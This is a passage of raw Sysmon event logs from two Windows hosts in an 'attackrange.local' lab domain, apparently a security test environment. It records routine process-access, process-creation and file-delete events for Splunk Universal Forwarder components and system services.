Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104663Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:59.516{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104662Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:59.516{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104661Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:59.516{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104660Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:59.516{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104659Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:59.516{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B3CB-615A-F801-00000000FC01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104658Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:59.516{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B3CB-615A-F801-00000000FC01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104657Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:59.518{58E9C193-B3CB-615A-F801-00000000FC01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104656Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:59.485{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FF37AAC0E376216443897AB08FE8DE6,SHA256=C166E12B879B0FC82F45DDC3E257CE18E0D0FF66FC0CE7560734774ADF5C13F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082566Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.998{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3CA-615A-7201-00000000FD01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082565Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082564Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082563Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082562Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082561Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082560Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082559Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082558Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082557Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.998{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082556Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.998{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B3CA-615A-7201-00000000FD01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082555Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.998{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3CA-615A-7201-00000000FD01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082554Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:56:58.999{2FDD8D40-B3CA-615A-7201-00000000FD01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104655Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:59.110{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC3B512FCBD766FCD151E0B3484CE868,SHA256=8D010447B87D6D279899B2849948160BAF68A6D6848B60F6DA1BF2AB9084DA3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104654Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:56:59.110{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BA0CAFEC7A608FCC29B08EFB163F4AB,SHA256=32CF98FC3DBADABECFBC91DE94CDD31100DA693528BDB31E67405DE83294F363,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082570Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:00.874{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCB89BB377FE576F1402C1B65CB5E054,SHA256=DD7D314C791A10ADD4A4BDBC96A24525B21E4820AD6C75AB49F50C84740137E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104677Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:00.516{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC3B512FCBD766FCD151E0B3484CE868,SHA256=8D010447B87D6D279899B2849948160BAF68A6D6848B60F6DA1BF2AB9084DA3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104676Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:00.485{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DB180FDB946A19A1545EEFC216DC918,SHA256=EF2C4E6407EA9EB10D838BDBDF43C7B671944715A71ACDB5EAE1BF2EA29DD91B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082569Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:00.139{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=581854E7D70FDCC9BA04DDD4AC191170,SHA256=579CEEA04DFDC41B5623C035D9028096E62CDCA6B6F6C4B8B4904FF30BAA5276,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082568Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:00.139{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92E7AC4ED76AF34BEDD770A2574D5630,SHA256=D2EA21BB526864D935908C8BE1C0BDD882A4A19125D74E7590D095CCB22E3CED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104675Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:00.469{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B3CC-615A-F901-00000000FC01}4440C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104674Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:00.469{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104673Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 